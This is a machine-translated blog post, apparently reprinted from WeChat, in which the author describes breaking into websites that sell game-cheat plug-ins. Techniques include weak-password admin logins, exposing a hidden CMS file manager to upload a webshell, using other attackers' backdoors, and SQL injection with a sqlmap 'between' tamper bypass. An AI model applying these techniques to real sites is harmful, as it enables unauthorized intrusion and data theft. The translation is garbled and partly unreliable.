Title: Infiltration cases of shooting at chicken-eating plug-ins

1. Case 1

Because I was beaten by a cheater recently, I am planning to let those cheaters understand what autism means. Last night, I climbed nearly 1,000 platforms selling chicken-eating plug-ins

You guys who sell cheats will hit you one by one when I have time.

I found that most of them use an Aspx program, but unfortunately, you cannot audit white box without source code, and you can't find any holes in the black box.

I can only find soft persimmons to pinch them, and I hammered four of them in one breath last night

There are basically pagodas

However, the php-venom 4 series and the supporting encoder have become more stable than the pagoda

I took off my pants and found that there were 4000+ data inside

Another chicken-eating plug-in station was hit tonight

Unfortunately, the embarrassing is that there is no write permission

Write a big hydrological record

1. No routine to enter the backstage

This should be considered a promotional site, there is nothing in it, only promotional content

No matter what you are, just do it.

I took a look at it. It was the second development site of Dreamweaver

It's easy to enter the backstage, and everyone understands what it means here.

2. Metaphysical Backend

I found that the backend deleted many functions, especially the Dreamweaver File Manager

But from a empirical perspective, many of these secondary developments do not really delete the editor, but they are not displayed on the background page.

Review element start

Just find a link to change it and replace it with media_main.php?dopost=filemanager

Then clicked, and found the file manager page

Upload shell

I thought it would end like this

It turned out that although the upload was successful, there was nothing

I thought it was waf, so I changed to a harmless jpg that was not bad enough to go on it.

I think it's a directory permission issue

Find the temporary file of session and upload it, but it still won't work.

I won't put the picture, but I can't pass it on.

I think it may be that the entire site has no permission to write

Try the deletion function and find that you can delete files

emmmmm, so do you have permission?

Generally speaking, if you don't have write permissions, there will be no modification permissions, that is, there is no delete permissions.

Thinking about whether the upload function is broken, change the method to getshell

3. The first thing that comes to mind when failing geshell is to modify the file and put a shell in it

Showing csrf token is wrong

How to solve it after searching

I found that I changed the check function directly, and added return in the first sentence

As a result, this error also popped up when modifying the config.php file

So I fell into a dead cycle.

Changing the tag is the same error.

Then I tried each 0day of Dreamweaving and executed the background code at will.

The prompt execution was successful, but either the 404 page or the csrf token reported an error

Why does CSSRF token detection always fail? I have never encountered such a problem before. Is it because I was wrong?

If my cousin knows why, please tell me thank you

4. Successfully gotshll originally thought about it, and then went out to have a meal.

Then I wondered if there would be someone else’s backdoor since it was a weak password.

I remember that Dreamweaver has its own backdoor detection and killing function

For the same review element, find the backdoor check function and start scanning

Sure enough, suspicious files were found

Then I saw that it was all the other people's back doors

Find any one and connect it

5. Finally, I found that it was an off-star host and the entire site did not have write permissions, so no wonder it could not be uploaded.

After flipping through the directory, you cannot cross-site, you do not have write permissions, you cannot bypass disable function

It's like there's nothing.

But the magic is that you can delete any file

I won't delete the site, save the evidence

2. Case 2

First, open the website and we can see its cool interface

Heartwarming announcement

Shameless propaganda words

1. Discovery Injection

Based on tp3 development, background/admin

Try a universal password

Prompt password error

Try admin admin888 and prompt that the account does not exist

The two echo differently, considering that there may be injection

2. Cannot use burp to catch packets and send them to repeater for further testing

Return status: -2 when the condition is found to be true, return status: -1 when the condition is false

Further confirmation of the conjecture, the background injection exists

Throw it to sqlmap to run

Injection cannot be detected, prompting a bunch of 404 not found

At first I thought it was CDN blocking SQLmap traffic, but later I found that there was no protection at all. Fake cdn

So consider that it might be that cms filtered something

3. Bypass the filtering and after testing, it will be returned 404 as long as angle brackets appear.

You can use between to bypass

At this time, continue to display back and forth according to the condition true=-2 condition false=-1

The blind spot condition is met

Suddenly I thought this situation was the same as the injected question in the fifth space final.

True returns to one page, false returns to another page, filtered characters appear and return to other pages, and use between to bypass

CTF is sincere and doesn't deceive me

So just add --tamper=between to the sqlmap parameters

4. Last

The AES encryption used by the administrator password in the database is without a secret key and cannot be decrypted.

The login port of ordinary users is closed, and they cannot register or log in.

There is no use except for the information about orphans to escape.

Pack up the evidence and submit it to the relevant departments

Reprinted from the original link: https://mp.weixin.qq.com/s/Bms1EPvpb1S7sU2KQX8ctA